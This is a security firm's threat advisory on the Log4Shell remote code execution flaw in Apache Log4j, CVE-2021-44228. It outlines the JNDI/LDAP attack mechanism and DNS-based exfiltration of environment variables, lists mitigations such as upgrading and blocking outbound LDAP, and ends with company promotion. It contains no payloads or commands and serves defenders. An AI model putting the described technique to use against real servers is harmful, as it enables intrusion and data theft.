Threat Advisory: Apache Log4j Remote Code Execution (Log4Shell)

Apache Log4j is an open-source Java-based logging framework used within Java applications. On December 9, 2021, a large-scale vulnerability was found in Apache Log4j known as Log4Shell, also known by its Common Vulnerabilities and Exposures number (CVE) CVE-2021-44228.  This is a zero-day arbitrary code execution vulnerability.

The vulnerability takes advantage of Log4j not checking against LDAP (Lightweight Directory Access Protocol) and JNDI (Java Naming and Directory Interface requests), allowing attackers to execute arbitrary Java code on a server or other computer. Tenable has stated that this CVE is “the single biggest, most critical vulnerability of the last decade“. Log4Shell has a CVSS rating of 10, the highest available score.

Adarma customer facing and service delivery, threat advisory and IT/Security teams are actively working with customers on wide range of issues and solutions needed to support this vulnerability. We deem this vulnerability as critical due to the wide-ranging nature of systems that are at potential of exploitation. This is especially the case as systems whose internet facing components may not appear susceptible could still be vulnerable if they interface with downstream components that use the Log4j library.

We are observing that this vulnerability is being actively exploited and although most observed attacks appear to require customisation to make them more effective against existing protective security controls, malicious actors can amend their attack very rapidly to achieve system and network compromise.

Figure 1: GovCERT.ch (https://govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/)

Recommendations:

– Installations of Log4J v2 should be updated to the latest non-vulnerable version (v2.16.0 at the time of writing).

– Disable all outbound LDAP from servers explicitly via local filter, firewall, proxy, and screening router. Ensure outbound traffic is via proxy.

– Implement blocking rules using Web Application Firewalls

– If unable to update and currently running a version after 2.10 disable message lookups or remove the JndiLookup class

– Do not re-enable the lookup functionality

– Initiate threat hunts to look for possible attempts to exploit this vulnerability

Threat hunting is an essential component of any defence strategy. We recommend the practice of building advanced detection capabilities to proactively search for cyber threats that have bypassed preventative controls and are evading detection.

Threat hunting involves initiating investigation and exploration to find unusual or anomalous behaviours that indicate malicious activity or intent.

Updated

Installations of Log4J v2 should be updated to the latest non-vulnerable version 2.16.o The previously release version (v2.15.0) which mitigates the remote code execution vulnerability was still vulnerable to Denial of Service attacks.

Fully weaponised and automated attacks are now being seen in the wild with many of them taking advantage of DNS to exfiltrate sensitive information (such as environment variables) from servers, rather than attempting to download and execute remote code.

Adarma would re-iterate its recommendation that organisations should ensure that all outbound traffic is directed via filtering proxy/DNS servers. Strict allowlists should be implemented on these servers.

Why Adarma?

We promise to stand by the side of our customers every day; providing trusted and transparent security solutions that protect against threats, mitigate risk, and deliver the business outcomes you need to make a remarkable difference.

Working together with you and your team, we provide advice, intelligence, technology and managed security services with complete visibility and transparency to ensure you are fully protected as you transform, innovate, and grow.

We were founded and are still run by security industry leaders, so understand the challenges faced by businesses and security professionals alike. As one of the UK’s largest independent security services providers, we have an extensive and discerning view of the current threats.

Our industry award-winning services and solutions support a wide range of organisations to create a security strategy that’s tailored to their unique needs. Our portfolio includes:

– Advisory and Assessment Services to help you identify how and what to improve

– Security Technology and Engineering to help you build the best security relevant to your risk profile

– Managed Threat and Incident Response that ensures you have control to reduce risk

– Threat Intelligence Services to reveal and mitigate your vulnerabilities

Contact us now to find out how Adarma can help protect your business or speak to your Adarma representative for more information.

Stay up-to-date with the latest threat insights from Adarma by following us on Twitter and LinkedIn.